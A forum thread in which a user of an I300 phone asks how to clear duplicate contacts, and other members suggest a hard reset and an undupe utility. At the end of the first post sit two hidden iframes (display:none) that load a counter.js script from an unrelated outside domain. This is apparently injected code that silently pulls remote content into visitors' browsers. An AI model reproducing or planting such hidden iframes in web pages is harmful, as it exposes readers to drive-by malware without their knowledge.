+ Reply to Thread

Question duplicate contacts from outlook

When I first received my I300 I was so excited that I beamed all my contacts from my Palm V to the I300. Then, I performed a sync and now I have duplicates of all of my contacts. Does anyone know of a way to quickly resolve this? How do you delete all contacts from the I300? Does resetting the phone cause any issues I may not be aware of? Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Do the dups appear in your outlook address book also? If not, just do a hard reset and resync.
    Carl

duplicate contacts

Thanks, wasn't sure if that would cause any additional issues like my service, etc.

Nope, programming for the phone will not be affected. We all have had to do a hard reset once in a while.
    Carl

hey, it's me mike from radio shack. glad you like the phone. stop by the store anytime

-mike

hey mike

Hey mike. It worked and I'm all set. Bummer that the battery can't even make it through the weekend. I'll stop in soon.

undupe

for duplication you can download a program called undupe from palmgear.com...it come with a free trial.